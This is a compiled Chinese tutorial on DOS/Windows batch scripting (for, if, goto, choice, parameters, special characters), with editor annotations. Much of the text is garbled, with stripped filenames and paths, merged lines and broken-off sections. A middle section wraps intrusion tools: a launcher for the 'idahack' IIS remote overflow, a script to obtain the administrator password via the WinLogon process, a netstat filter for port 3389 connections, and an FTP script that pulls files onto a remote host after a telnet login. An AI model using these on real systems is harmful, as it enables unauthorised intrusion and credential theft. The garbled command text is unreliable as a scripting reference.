要在批处理程序中使用 for 命令，请使用以下语法：

for %%variable in (set) docommand [command-parameters]

要在命令提示符下使用 for，请使用以下语法：

for %variable in (set) do command [command-parameters]

参数%%variable 或 %variable代表可替换的参数。for 命令使用在 set 中指定的每个

文本字符串替换 %%variable（或 %variable），直到此命令（在 command-parameters 中指

定）处理所有的文件为止。使用 %% variable 在批处理程序中执行 for 命令。使用 %

variable 通过命令提示符执行 for 命令。变量名区分大小写。

(set)指定要用指定的命令处理的一个或多个文件或文本字符串。需要括号。

command指定要在指定的 set 所包含的每个文件上执行的命令。

command-parameters指定要用于指定命令（如果指定的命令要使用任何参数或开关）的

任何参数或开关。

如果启用了命令扩展（Windows 2000 中的默认设置)，将支持 for 命令的其他形式。

For 命令的其他形式如果启用了命令扩展，将支持如下 for 命令的其他格式：

只限于目录for /D [%% | %]variable in (set) docommand [command-parameters]

如果 set 包含通配符（* 和 ?），则指定与目录名匹配，而不是文件名。

递归for /R [[drive :]path] [%% | %]variable in (set) docommand

[command-parameters]

进入根目录树[drive:]path，在树的每个目录中执行 for 语句。如果在 /R 后没有指

定目录，则假定为当前目录。如果 set 只是一个句号 (.) 字符，则只列举目录树。

迭代for /L [%% | %]variable in (start，step，end) do command [command-parameters]

集合是一系列按步长量划分的、从头到尾的数字。这样，(1,1,5) 将生成序列 1 2 3 4

5，而 (5,-1,1) 将生成序列 (5 4 3 2 1)。

BAT文件技巧文章结构1. 所有内置命令的帮助信息2. 环境变量的概念3. 内置的特殊

符号(实际使用中间注意避开)4. 简单批处理文件概念5. 附件1 6. 附件2

#####################################################################

#1. 所有内置命令的帮助信息

######################################################################vercmd /?

set /?

rem /?

if /?

echo /?

goto /?

for /?

shift /?

call /?

其他需要的常用命令type /?

find /?

findstr /?

copy /?

______________________________________________________________________下面

将所有上面的帮助输出到一个文件echo ver > >>o cmd

/? >> /? >>o rem /? >> /? >>o if

/? >> /? >>o goto /? >>o /? >>o for

/? >> /? >>o shift /? >>ft /? >>o call

/? >>l /? >>o type /? >>e /? >>o find

/? >>d /? >>o findstr /? >>dstr /? >>o copy

/? >>y /? >>e

______________________________________________________##################

####################################################2. 环境变量的概念

######################################################################_________

____________________________________________________________________C rogram

Files>setALLUSERSPROFILE=C ocuments and SettingsAll UsersCommonProgramFiles=C

rogram FilesCommon

FilesCOMPUTERNAME=FIRSTComSpec=C:BER_OF_PROCESSORS=1OS=W

indows_NTOs2LibPath=C:WINNTsystem32os2dll;Path=C:WINNTsystem32;C:WINNT;C:WINNTs

ystem32WBEMPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSHPROCESSOR_AR

CHITECTURE=x86PROCESSOR_IDENTIFIER=x86 Family 6 Model 6 Stepping 5,

GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=0605ProgramFiles=C rogram

FilesPROMPT=$P$GSystemDrive=C:

SystemRoot=C:WINNTTEMP=C:WINNTTEMPTMP=C:WINNTTEMPUSERPROFILE=C ocuments and

SettingsDefault

Userwindir=C:WINNT_____________________________________________________________

________________path: 表示可执行程序的搜索路径. 我的建议是你把你的程序copy

到%windir%system32. 这个目录里面. 一般就可以自动搜索到.

语法: copy %windir%system32.

使用点(.) 便于一目了然对环境变量的引用使用(英文模式,半角)双引号%windir% 变

量%%windir%% 二次变量引用.

我们常用的还有%temp% 临时文件目录%windir% 系统目录%errorlevel% 退出代码输出

文件到临时文件目录里面.这样便于当前目录整洁.

对有空格的参数. 你应该学会使用双引号("") 来表示比如对porgram file文件夹操作

C:>dir p*C: 的目录2000-09-02 11:47 2,164 1999-01-03 00:47Program Files1 个

文件 2,164 字节1 个目录 1,505,997,824 可用字节C:>cd pro*C:Program Files>

C:>

C:>cd " rogram Files"C:Program Files>

######################################################################3. 内

置的特殊符号(实际使用中间注意避

开)######################################################################微软里

面内置了下列字符不能够在创建的文件名中间使用con nul aux / | || && ^ > < *You can

use most characters as variable values, including white space. If you use the special

characters <, >, |, &, or ^, you must precede them with the escape character (^)

or quotation marks. If you use quotation marks, they are included as part of the

value because everything following the equal sign is taken as the value. Consider

the following examples:

(大意: 要么你使用^作为前导字符表示.或者就只有使用双引号""了)To create the

variable value new&name, type:

set varname=new^&nameTo create the variable value "new&name", type:

set varname="new&name"The ampersand (&), pipe (|), and parentheses ( ) are

special characters that must be preceded by the escape character (^) or quotation

marks when you pass them as arguments.

find " acific Rim" < > EXIST filename. (del filename.)

ELSE echo filename. missing> 创建一个文件>> 追加到一个文件后面@ 前缀字符.表示执

行时本行在cmd里面不显示, 可以使用 echo off关闭显示^ 对特殊符号( > < &)的前导字符.

第一个只是显示aaa 第二个输出文件bbbecho 123456 ^> aaaecho 1231231 > bbb() 包含命

令(echo aa & echo bb), 和空格一样的缺省分隔符号.

; 注释,表示后面为注释: 标号作用| 管道操作& Usage：第一条命令 & 第二条命令 [&

第三条命令...]

用这种方法可以同时执行多条命令，而不管命令是否执行成功dir c:*.exe & dir

d:*.exe & dir e:*.exe&& Usage：第一条命令 && 第二条命令 [&& 第三条命令...]

当碰到执行出错的命令后将不执行后面的命令，如果一直没有出错则一直执行完所有命

令；|| Usage：第一条命令 || 第二条命令 [|| 第三条命令...]

当碰到执行正确的命令后将不执行后面的命令，如果没有出现正确的命令则一直执行完

所有命令；常用语法格式IF [NOT] ERRORLEVEL number command para1 para2IF [NOT]

string1==string2 command para1 para2IF [NOT] EXIST filename command para1 para2IF

EXIST filename command para1 para2IF NOT EXIST filename command para1 para2IF

"%1"=="" goto ENDIF "%1"=="net" goto NETIF NOT "%2"=="net" goto OTHERIF ERRORLEVEL

1 command para1 para2IF NOT ERRORLEVEL 1 command para1 para2FOR /L %%i IN

(start,step,end) DO command [command-parameters] %%iFOR /F "eol=; tokens=2,3*

delims=, " %i in () do echo %i %j %k按照字母顺序 ijklmnopq依次取参数.

eol=c - 指一个行注释字符的结尾(就一个)skip=n - 指在文件开始时忽略的行数。

delims=xxx - 指分隔符集。这个替换了空格和跳格键的默认分隔符集。

######################################################################4. 简

单批处理文件概念

######################################################################echo This

is test > e o This is test 11111 >> e o This is test

22222 > e 第二个echo是追加第三个echo将清空 重新创建

stat -n | find "3389"这个将要列出所有连接3389的用户的ip.

___________________________________________________________________@ech

o please careecho plese care 1111echo plese care 2222echo plese care 3333@echo please

care@echo plese care 1111@echo plese care 2222@echo plese care 3333rem 不显示注

释语句,本行显示@rem 不显示注释语句,本行不显示@if exist %windir%

(echo Find !!!) else (echo ERROR: Not find )@if

exist %windir% (echo Find !!!) else (echo ERROR: Not find

)______________________________________________________________________

_____下面我们以具体的一个idahack程序就是ida远程溢出为例子.应该是很简单的.

____________________________________________________________________@rem

ver 1.0@if NOT exist %windir% echo "ERROR: dont find

"@if NOT exist %windir% echo "ERROR: dont find "@if

"%1" =="" goto USAGE@if NOT "%2" =="" goto SP2:start@echo Now start ...

@ping %1@echo chinese win2k:1 sp1:2 sp2: %1 80 1 99 >%temp%_tmp@echo

"prog exit code [%errorlevel%] "@type %temp%_tmp@find "good luck

" %temp%_tmp@echo "prog exit code [%errorlevel%] find [goog luck]"@if NOT errorlevel

1 %1 99@goto END:SP2@ %1 80 %2 99 %temp%_tmp@type %temp%_tmp@find

"good luck " %temp%_tmp@if NOT errorlevel 1 %1 99@goto END:USAGE@echo Example:

IP@echo Example: IP

(2,3):END_______________________END_________________________________下面

我们再来第二个文件.就是得到administrator的口令.

大多数人说得不到.其实是自己的没有输入正确的信息.

______________________________________________________________________

_@rem ver 1.0@if NOT exist %windir% echo "ERROR: dont find

"@if NOT exist %windir% echo "ERROR: dont find

"@

@echo ____________________________________@if "%1"=="" goto

USAGE@ %1 %2 %3 >> %temp%_@echo "prog exit code

[%errorlevel%] "@type %temp%_@echo

________________________________Here__pass★★★★★★★★@ipconfig

/all >>%temp%_@goto

END:USAGE@ >%temp%_@ /i "WINLOGON explorer

internat" %temp%_@echo "Example: %1 %2 %3 %4 !!!"@echo "Usage:

DomainName UserName PID-of-WinLogon":END@echo "

%COMPUTERNAME% %USERNAME% administrator "@echo " end

[%errorlevel%] !"____________________END______________________________

__________还有一个就是已经通过telnet登陆了一个远程主机.怎样上传文件(win)依次在

窗口输入下面的东西. 当然了也可以全部拷贝.Ctrl+V过去. 然后就等待吧!!

echo open 4 3396>wecho read>>wecho read>>wecho cd winnt>>wecho

binary>>wecho pwd >>wecho get >>wecho get >>wecho get

>>wecho quit >>wftp -s:w

（十一）编写.bat程序

bat是dos下的批处理文件.cmd是nt内核命令行环境的另一种批处理文件从更广义的角

度来看，unix的shell脚本以及其它操作系统甚至应用程序中由外壳进行解释执行的文本，

都具有与批处理文件十分相似的作用，而且同样是由专用解释器以行为单位解释执行，这种

文本形式更通用的称谓是脚本语言。所以从某个程度分析，batch, unix shell, awk, basic,

perl 等脚本语言都是一样的，只不过应用的范围和解释的平台各有不同而已。甚至有些应

用程序仍然沿用批处理这一称呼，而其内容和扩展名与dos的批处理却又完全不同。

===================================

首先批处理文件是一个文本文件，这个文件的每一行都是一条DOS命令（大部分时候就

好象我们在DOS提示符下执行的命令行一样），你可以使用DOS下的Edit或者Windows的记事本

(notepad)等任何文本文件编辑工具创建和修改批处理文件。

==== 注 ===================

批处理文件中完全可以使用非dos命令，甚至可以使用不具有可执行特性的普通数据性

文件，这缘于windows系统这个新型解释平台的涉入，使得批处理的应用越来越"边缘化"。

所以我们讨论的批处理应该限定在dos环境或者命令行环境中，否则很多观念和设定都需要

做比较大的变动。

========================

其次，批处理文件是一种简单的程序，可以通过条件语句(if)和流程控制语句(goto)

来控制命令运行的流程，在批处理中也可以使用循环语句(for)来循环执行一条命令。当然，

批处理文件的编程能力与C语言等编程语句比起来是十分有限的，也是十分不规范的。批处

理的程序语句就是一条条的DOS命令（包括内部命令和外部命令），而批处理的能力主要取决

于你所使用的命令。

==== 注 ==================

批处理文件(batch file)也可以称之为批处理程序(batch program)，这一点与编译型

语言有所不同，就c语言来说，扩展名为c或者cpp的文件可以称之为c语言文件或者c语言源

代码，但只有编译连接后的exe文件才可以称之为c语言程序。因为批处理文件本身既具有文

本的可读性，又具有程序的可执行性，这些称谓的界限是比较模糊的。

===========================

第三，每个编写好的批处理文件都相当于一个DOS的外部命令，你可以把它所在的目录

放到你的DOS搜索路径(path)中来使得它可以在任意位置运行。一个良好的习惯是在硬盘上

建立一个bat或者batch目录（例如C:BATCH），然后将所有你编写的批处理文件放到该目录

中，这样只要在path中设置上c:batch，你就可以在任意位置运行所有你编写的批处理程序。

==== 注 =====

纯以dos系统而言，可执行程序大约可以细分为五类，依照执行优先级由高到低排列分

别是：DOSKEY宏命令（预先驻留内存），中的内部命令（根据内存的环境随时进

驻内存），以com为扩展名的可执行程序（由 直接载入内存），以exe位扩展名的

可执行程序（由 重定位后载入内存），以bat位扩展名的批处理程序（由

解释分析，根据其内容按优先级顺序调用第2，3，4，5种可执行程序，分析一

行，执行一行，文件本身不载入内存）

第四，在DOS和Win9x/Me系统下，C:盘根目录下的批处理文件是自动运行

批处理文件，每次系统启动时会自动运行该文件，你可以将系统每次启动时都要运行的命令

放入该文件中，例如设置搜索路径，调入鼠标驱动和磁盘缓存，设置系统环境变量等。下面

是一个运行于Windows 98下的的示例：

@ECHO OFFPATH

C:WINDOWS;C:WINDOWSCOMMAND;C:UCDOS;C:DOSTools;C:SYSTOOLS;C:WINTOOLS;C:B

ATCHLH /XLH /insertLH TEMP=D:TEMPSET

TMP=D:TEMP

==== 注 =====

为DOS系统的自动运行批处理文件，由启动时解释执行；而在

Win9x环境中，不仅增加支持了 , 等许多其它自动运行的批处

理文件，对 也增加了 .DOS .W40 .BAK .OLD .PWS 等许多变体以适应复杂的

环境和多变的需求。

==== willsort 编注 =============

以下关于命令的分类，有很多值得推敲的地方。常用命令中的@本不是命令，而dir、copy

等也很常用的命令却没有列入, 而特殊命令中所有命令对我来说都是常用命令。建议将批处

理所引用的命令分为内部命令、外部命令、第三方程序三类。而内部命令和外部命令中别有

一类是专用于或常用于批处理中的命令可称之为"批处理命令"。

以下摘录MS-DOS 6.22 帮助文档中关于"批处理命令"的文字，当然，其中有些概念和定

义已经有些落后了。

批处理命令批处理文件或批处理程序是一个包含若干MS-DOS命令的正文文件，扩展名

为.BAT。当在命令提示符下敲入批处理程序的名称时，MS-DOS成组执行此批处理程序中的命

令。

任何在命令提示符下可使用的命令都可用在批处理程序中。此外，下面MS-DOS命令是专

门在批处理程序中使用的。

==========

常用命令echo、@、call、pause、rem(小技巧：用::代替rem)是批处理文件最常用的几

个命令，我们就从他们开始学起。

==== 注 ===========

首先, @ 不是一个命令, 而是DOS 批处理的一个特殊标记符, 仅用于屏蔽命令行回显.

下面是DOS命令行或批处理中可能会见到的一些特殊标记符:

CR(0D) 命令行结束符Escape(1B) ANSI转义字符引导符Space(20) 常用的参数界定符

Tab(09) ; = 不常用的参数界定符+ COPY命令文件连接符* ? 文件通配符"" 字符串界定符|

命令管道符< > >> 文件重定向符@ 命令行回显屏蔽符/ 参数开关引导符: 批处理标签引导

符% 批处理变量引导符其次, :: 确实可以起到rem 的注释作用, 而且更简洁有效; 但有两

点需要注意:

第一, 除了 :: 之外, 任何以 :开头的字符行, 在批处理中都被视作标号, 而直接忽

略其后的所有内容, 只是为了与正常的标号相区别, 建议使用 goto 所无法识别的标号,

即在 :后紧跟一个非字母数字的一个特殊符号.

第二, 与rem 不同的是, ::后的字符行在执行时不会回显, 无论是否用echo on打开命

令行回显状态, 因为命令解释器不认为他是一个有效的命令行, 就此点来看, rem 在某些

场合下将比 :: 更为适用; 另外, rem 可以用于 文件中.

=====================

echo 表示显示此命令后的字符echo off 表示在此语句后所有运行的命令都不显示命

令行本身@与echo off相象，但它是加在每个命令行的最前面，表示运行时不显示这一行的

命令行（只能影响当前行）。

call 调用另一个批处理文件（如果不用call而直接调用别的批处理文件，那么执行完

那个批处理文件后将无法返回当前文件并执行当前文件的后续命令）。

pause 运行此句会暂停批处理的执行并在屏幕上显示Press any key

的提示，等待用户按任意键后继续rem 表示此命令后的字符为解释行（注释），不执行，只

是给自己今后参考用的（相当于程序中的注释）。

==== 注 =====

此处的描述较为混乱, 不如直接引用个命令的命令行帮助更为条理

-------------------------

ECHO当程序运行时，显示或隐藏批处理程序中的正文。也可用于允许或禁止命令的回显。

在运行批处理程序时，MS-DOS一般在屏幕上显示（回显）批处理程序中的命令。

使用ECHO命令可关闭此功能。

语法ECHO [ON|OFF]

若要用echo命令显示一条命令，可用下述语法：

echo [message]

参数ON|OFF指定是否允许命令的回显。若要显示当前的ECHO的设置，可使用不带参数的

ECHO命令。

message指定让MS-DOS在屏幕上显示的正文。

-------------------

CALL从一个批处理程序中调用另一个批处理程序，而不会引起第一个批处理的中止。

语法CALL [drive:][path]filename [batch-parameters]

参数[drive:][path]filename指定要调用的批处理程序的名字及其存放处。文件名必须

用.BAT作扩展名。

batch-parameters指定批处理程序所需的命令行信息。

-------------------------------

PAUSE暂停批处理程序的执行并显示一条消息，提示用户按任意键继续执行。只能在批

处理程序中使用该命令。

语法PAUSEREM在批处理文件或中加入注解。也可用REM命令来屏蔽命令（在

中也可以用分号 ; 代替REM命令，但在批处理文件中则不能替代）。

语法REM [string]

参数string指定要屏蔽的命令或要包含的注解。

=======================

例1：用edit编辑文件，输入下列内容后存盘为c:，执行该批处理文件后可

实现：将根目录中所有文件写入 中，启动UCDOS，进入WPS等功能。

批处理文件的内容为: 命令注释：

@echo off 不显示后续命令行及当前命令行dir c:*.* > 将c盘文件列表写入

l c: 调用ucdosecho 你好 显示"你好"pause 暂停,等待按键继

续rem 准备运行wps 注释：准备运行wpscd ucdos 进入ucdos目录wps 运行wps批处理文件的

参数批处理文件还可以像C语言的函数一样使用参数（相当于DOS命令的命令行参数），这需

要用到一个参数表示符"%"。

%[1-9]表示参数，参数是指在运行批处理文件时在文件名后加的以空格（或者Tab）分

隔的字符串。变量可以从%0到%9，%0表示批处理命令本身，其它参数字符串用%1到%9顺序表

示。

例2：C:根目录下有一批处理文件名为，内容为：

@echo offformat %1如果执行C:>f a:

那么在执行时，%1就表示a:，这样format %1就相当于format a:，于是上面的命

令运行时实际执行的是format a:

例3：C:根目录下一批处理文件名为，内容为:

@echo offtype %1type %2那么运行C:>t %1 : 表示%2 : 表示

于是上面的命令将顺序地显示和文件的内容。

==== 注 ===============

参数在批处理中也作为变量处理, 所以同样使用百分号作为引导符, 其后跟0-9中的一

个数字构成参数引用符. 引用符和参数之间 (例如上文中的 %1 与 a: ) 的关系类似于变

量指针与变量值的关系. 当我们要引用第十一个或更多个参数时, 就必须移动DOS 的参数

起始指针. shift 命令正充当了这个移动指针的角色, 它将参数的起始指针移动到下一个

参数, 类似C 语言中的指针操作. 图示如下:

初始状态, cmd 为命令名, 可以用 %0 引用cmd arg1 arg2 arg3 arg4 arg5 arg6 arg7

arg8 arg9 arg10^ ^ ^ ^ ^ ^ ^ ^ ^ ^| | | | | | | | | |%0 %1 %2 %3 %4 %5 %6 %7 %8 %9

经过1次shift后, cmd 将无法被引用cmd arg1 arg2 arg3 arg4 arg5 arg6 arg7 arg8 arg9

arg10^ ^ ^ ^ ^ ^ ^ ^ ^ ^| | | | | | | | | |%0 %1 %2 %3 %4 %5 %6 %7 %8 %9经过2次

shift后, arg1也被废弃, %9指向为空, 没有引用意义cmd arg1 arg2 arg3 arg4 arg5 arg6

arg7 arg8 arg9 arg10^ ^ ^ ^ ^ ^ ^ ^ ^| | | | | | | | |%0 %1 %2 %3 %4 %5 %6 %7 %8

遗憾的是, win9x 和DOS下均不支持 shift 的逆操作. 只有在 nt 内核命令行环境下,

shift 才支持 /n 参数, 可以以第一参数为基准返复移动起始指针.

=================

特殊命令if goto choice for是批处理文件中比较高级的命令，如果这几个你用得很熟

练，你就是批处理文件的专家啦。

一、if 是条件语句，用来判断是否符合规定的条件，从而决定执行不同的命令。 有三

种格式:

1、if [not] "参数" == "字符串" 待执行的命令参数如果等于(not表示不等，下同)

指定的字符串，则条件成立，运行命令，否则运行下一句。

例：if "%1"=="a" format a:

====

if 的命令行帮助中关于此点的描述为:

IF [NOT] string1==string2 command在此有以下几点需要注意:

1. 包含字符串的双引号不是语法所必须的, 而只是习惯上使用的一种"防空"字符2.

string1 未必是参数, 它也可以是环境变量, 循环变量以及其他字符串常量或变量3.

command 不是语法所必须的, string2 后跟一个空格就可以构成一个有效的命令行

=============================

2、if [not] exist [路径]文件名 待执行的命令如果有指定的文件，则条件成立，运

行命令，否则运行下一句。

如: if exist c: type c:表示如果存在c:文件，

则显示它的内容。

****** 注 ********也可以使用以下的用法:

if exist commanddevice 是指DOS系统中已加载的设备, 在win98下通常有:

AUX, PRN, CON, NULCOM1, COM2, COM3, COM4LPT1, LPT2, LPT3, LPT4XMSXXXX0,

EMMXXXX0A: B: C: ...,CLOCK$, CONFIG$, DblBuff$, IFS$HLP$具体的内容会因硬软件环境

的不同而略有差异, 使用这些设备名称时, 需要保证以下三点:

1. 该设备确实存在(由软件虚拟的设备除外)2. 该设备驱动程序已加载(aux, prn等标

准设备由系统缺省定义)3. 该设备已准备好(主要是指a: b: ..., , 等)可

通过命令 mem/d | find "device" /i 来检阅你的系统中所加载的设备另外, 在DOS系统中,

设备也被认为是一种特殊的文件, 而文件也可以称作字符设备; 因为设备(device)与文件

都是使用句柄(handle)来管理的, 句柄就是名字, 类似于文件名, 只不过句柄不是应用于

磁盘管理, 而是应用于内存管理而已, 所谓设备加载也即指在内存中为其分配可引用的句

柄.

==================================

3、if errorlevel <数字> 待执行的命令很多DOS程序在运行结束后会返回一个数字值

用来表示程序运行的结果(或者状态)，通过if errorlevel命令可以判断程序的返回值，根

据不同的返回值来决定执行不同的命令(返回值必须按照从大到小的顺序排列)。如果返回值

等于指定的数字，则条件成立，运行命令，否则运行下一句。

如if errorlevel 2 goto x2==== 注 ===========返回值从大到小的顺序排列不是必须

的, 而只是执行命令为 goto 时的习惯用法, 当使用 set 作为执行命令时, 通常会从小到

大顺序排列, 比如需将返回码置入环境变量, 就需使用以下的顺序形式:

if errorlevel 1 set el=1if errorlevel 2 set el=2if errorlevel 3 set el=3if

errorlevel 4 set el=4if errorlevel 5 set

当然, 也可以使用以下循环来替代, 原理是一致的:

for %%e in (1 2 3 4 5 6 ) do if errorlevel %%e set el=%%e更高效简洁的

用法, 可以参考我写的另一篇关于获取 errorlevel 的文章出现此种现象的原因是, if

errorlevel 比较返回码的判断条件并非等于, 而是大于等于. 由于 goto 的跳转特性, 由

小到大排序会导致在较小的返回码处就跳出; 而由于 set命令的 "重复" 赋值特性, 由大

到小排序会导致较小的返回码 "覆盖" 较大的返回码.

另外, 虽然 if errorlevel=<数字> command 也是有效的命令行, 但也只是

解释命令行时将 = 作为命令行切分符而忽略掉罢了

===========================

二、goto 批处理文件运行到这里将跳到goto所指定的标号(标号即label，标号用:后跟

标准字符串来定义)处，goto语句一般与if配合使用，根据不同的条件来执行不同的命令组。

如:

goto end:endecho this is the end标号用":字符串"来定义，标号所在行不被执行。

==== willsort 编注label 常被译为 "标签" , 但是这并不具有广泛的约定性.

goto 与 : 联用可实现执行中途的跳转, 再结合 if 可实现执行过程的条件分支, 多

个 if 即可实现命令的分组, 类似 C 中 switch case 结构或者 Basic 中的 select case

结构, 大规模且结构化的命令分组即可实现高级语言中的函数功能. 以下是批处理和

C/Basic在语法结构上的对照:

Batch C / Basicgoto&: goto&:

goto&:&if if{}&else{} / if&elseif&endifgoto&:&if... switch&case / select

casegoto&:&if& function() / function(),sub()

三、choice 使用此命令可以让用户输入一个字符（用于选择），从而根据用户的选择返

回不同的errorlevel，然后于if errorlevel配合，根据用户的选择运行不同的命令。

注意：choice命令为DOS或者Windows系统提供的外部命令，不同版本的choice命令语法

会稍有不同，请用choice /?查看用法。

choice的命令语法（该语法为Windows 2003中choice命令的语法，其它版本的choice

的命令语法与此大同小异）：

CHOICE [/C choices] [/N] [/CS] [/T timeout /D choice] [/M text]

描述:

该工具允许用户从选择列表选择一个项目并返回所选项目的索引。

参数列表:

/C choices 指定要创建的选项列表。默认列表是 "YN"。

/N 在提示符中隐藏选项列表。提示前面的消息得到显示，选项依旧处于启用状态。

/CS 允许选择分大小写的选项。在默认情况下，这个工具是不分大小写的。

/T timeout 做出默认选择之前，暂停的秒数。可接受的值是从 0到 9999。如果指定了

0，就不会有暂停，默认选项会得到选择。

/D choice 在 nnnn 秒之后指定默认选项。字符必须在用 /C 选项指定的一组选择中;

同时，必须用 /T 指定 nnnn。

/M text 指定提示之前要显示的消息。如果没有指定，工具只显示提示。

/? 显示帮助消息。

注意:

ERRORLEVEL 环境变量被设置为从选择集选择的键索引。列出的第一个选择返回 1，第

二个选择返回 2，等等。如果用户按的键不是有效的选择，该工具会发出警告响声。如果该

工具检测到错误状态，它会返回 255 的ERRORLEVEL 值。如果用户按 Ctrl+Break 或 Ctrl+C

键，该工具会返回 0的 ERRORLEVEL 值。在一个批程序中使用 ERRORLEVEL 参数时，将参数

降序排列。

示例:

CHOICE /?

CHOICE /C YNC /M "确认请按 Y，否请按 N，或者取消请按 C。"CHOICE /T 10 /C ync

/CS /D yCHOICE /C ab /M "选项 1 请选择 a，选项 2 请选择 b。"CHOICE /C ab /N /M "

选项 1 请选择 a，选项 2 请选择 b。"==== willsort 编注

===============================

我列出win98下choice的用法帮助, 已资区分Waits for the user to choose one of a

set of choices.

等待用户选择一组待选字符中的一个CHOICE [/C[:]choices] [/N] [/S] [/T[:]c,nn]

[text]

/C[:]choices Specifies allowable keys. Default is YN指定允许的按键(待选字符),

默认为YN/N Do not display choices and ? at end of prompt string.

不显示提示字符串中的问号和待选字符/S Treat choice keys as case sensitive.

处理待选字符时大小写敏感/T[:]c,nn Default choice to c after nn seconds在 nn 秒

后默认选择 ctext Prompt string to display要显示的提示字符串ERRORLEVEL is set to

offset of key user presses in choices.

ERRORLEVEL 被设置为用户键入的字符在待选字符中的偏移值如果我运行命令：CHOICE

/C YNC /M "确认请按 Y，否请按 N，或者取消请按 C。"屏幕上会显示：

确认请按 Y，否请按 N，或者取消请按 C。 [Y,N,C]?

例：的内容如下（注意，用if errorlevel判断返回值时，要按返回值从高到

低排列）:

@echo offchoice /C dme /M "defrag,mem,end"if errorlevel 3 goto endif errorlevel

2 goto memif errorlevel 1 goto defrag:defragc:dosdefraggoto end:memmemgoto

end:endecho good bye此批处理运行后，将显示"defrag,mem,end[D,M,E]?" ，用户可选择d

m e ，然后if语句根据用户的选择作出判断，d表示执行标号为defrag的程序段，m表示执行

标号为mem的程序段，e表示执行标号为end的程序段，每个程序段最后都以goto end将程序

跳到end标号处，然后程序将显示good bye，批处理运行结束。

四、for 循环命令，只要条件符合，它将多次执行同一命令。

语法：

对一组文件中的每一个文件执行某个特定命令。

FOR %%variable IN (set) DO command [command-parameters]

%%variable 指定一个单一字母可替换的参数。

(set) 指定一个或一组文件。可以使用通配符。

command 指定对每个文件执行的命令。

command-parameters为特定命令指定参数或命令行开关。

例如一个批处理文件中有一行:

for %%c in (*.bat *.txt) do type %%c则该命令行会显示当前目录下所有以bat和txt

为扩展名的文件的内容。

==== willsort 编注 =====================================================

需要指出的是, 当()中的字符串并非单个或多个文件名时, 它将单纯被当作字符串替

换, 这个特性再加上()中可以嵌入多个字符串的特性, 很明显 for 可以被看作一种遍历型

循环.

当然, 在 nt/2000/xp/2003 系列的命令行环境中, for 被赋予了更多的特性, 使之可

以分析命令输出或者文件中的字符串, 也有很多开关被用于扩展了文件替换功能.

========================================================================

批处理示例1. IF-EXIST1) 首先用记事本在C:建立一个批处理文件，文件内

容如下：

@echo offIF EXIST TYPE NOT EXIST

ECHO does not exist然后运行它：

C:>如果C:存在文件，那么它的内容就会被显示出来，如果不

存在，批处理就会提示你该文件不存在。

2) 接着再建立一个文件，内容如下：

@ECHO OFFIF EXIST %1 TYPE %1IF NOT EXIST %1 ECHO %1 does not exist执行:

C:>TEST2 该命令运行结果同上。

说明：

(1) IF EXIST 是用来测试文件是否存在的，格式为IF EXIST [路径+文件名] 命令(2)

文件中的%1是参数，DOS允许传递9个批参数信息给批处理文件，分别为%1~%9(%0

表示test2命令本身) ，这有点象编程中的实参和形参的关系，%1是形参，是

实参。

==== willsort 编注 =====================================================

DOS没有 "允许传递9个批参数信息" 的限制, 参数的个数只会受到命令行长度和所调

用命令处理能力的限制. 但是, 我们在批处理程序中, 在同一时刻只能同时引用10个参数,

因为 DOS只给出了 %0~%9这十个参数引用符.

========================================================================

3) 更进一步的，建立一个名为的文件，内容如下：

@echo offIF "%1" == "A" ECHO XIAOIF "%2" == "B" ECHO TIANIF "%3" == "C" ECHO

XIN如果运行：

C:>TEST3 A B C屏幕上会显示:

XIAOTIANXIN如果运行：

C:>TEST3 A B屏幕上会显示XIAOTIAN在这个命令执行过程中，DOS会将一个空字符串指

定给参数%3。

2、IF-ERRORLEVEL建立，内容如下：

@ECHO OFFXCOPY C: D:IF ERRORLEVEL 1 ECHO 文件拷贝失败IF

ERRORLEVEL 0 ECHO 成功拷贝文件然后执行文件:

C:>TEST4如果文件拷贝成功，屏幕就会显示"成功拷贝文件"，否则就会显示"文件拷贝

失败"。

IF ERRORLEVEL 是用来测试它的上一个DOS命令的返回值的，注意只是上一个命令的返

回值，而且返回值必须依照从大到小次序顺序判断。

因此下面的批处理文件是错误的：

@ECHO OFFXCOPY C: D:IF ERRORLEVEL 0 ECHO 成功拷贝文件IF

ERRORLEVEL 1 ECHO 未找到拷贝文件IF ERRORLEVEL 2 ECHO 用户通过ctrl-c中止拷贝操作

IF ERRORLEVEL 3 ECHO 预置错误阻止文件拷贝操作IF ERRORLEVEL 4 ECHO 拷贝过程中写盘

错误无论拷贝是否成功，后面的：

未找到拷贝文件用户通过ctrl-c中止拷贝操作预置错误阻止文件拷贝操作拷贝过程中

写盘错误都将显示出来。

以下就是几个常用命令的返回值及其代表的意义：

backup0 备份成功1 未找到备份文件2 文件共享冲突阻止备份完成3 用户用ctrl-c中

止备份4 由于致命的错误使备份操作中止diskcomp0 盘比较相同1 盘比较不同2 用户通过

ctrl-c中止比较操作3 由于致命的错误使比较操作中止4 预置错误中止比较diskcopy0 盘

拷贝操作成功1 非致命盘读/写错2 用户通过ctrl-c结束拷贝操作3 因致命的处理错误使盘

拷贝中止4 预置错误阻止拷贝操作format0 格式化成功3 用户

（十二）BAT、CMD脚本的编写与实际应用

在微软官方的定义中，BAT属于批处理脚本（可以运行在DOS、WINDOWS下），是用来进行

简化平时操作的批量化集成文件。而CMD，则是只能运行在NT系统下的批处理文件，其功能

与BAT是一样的。

从早期的BAT开始，该文件就为大家提供了方便，并在WINDOWS出现后，它的能力可以说

是万能的。从最基础的启动盘的引导，到注册表，甚至系统服务的操作，BAT与CMD都可以胜

任。而且由于它简便的编写与通用性，很快就布满整个世界。

本文将简单介绍BAT与CMD脚本的编写过程，因为在下水平不高，所以如有错误欢迎指出！

一、BAT与CMD中的部分参数

1、定义文件夹的参数目前我能够搜集到并可以给出意思的通用系统参数如下（不包括

后边的解释部分）：

%windir% ——操作系统文件夹，一般为C:下的WINDOWS文夹

%sys% ——系统根目录，也就是C:盘录

%programfiles% ——Program Files目录，安装程序通常都安在这个目录下

%systemdrive% ——操作系统所在磁盘，与%sys%属于同一目录

%systemroot% ——操作系统文件夹，一般为C:下的WINDOWS文件夹

%InfDir% ——系统根目录，也就是C:盘目录

%TEMP% ——当前用户的临时目录，一般是C:Documents and

Settings用户名Local SettingsTemp目录

2、基础操作参数（可以在CMD命令行模式中输入HELP获得）ASSOC 显示或修改文件

扩展名关联。

AT 计划在计算机上运行的命令和程序。

ATTRIB 显示或更改文件属性。

BREAK 设置或清除扩展式 CTRL+C 检查。

CACLS 显示或修改文件的访问控制列表(ACLs)。

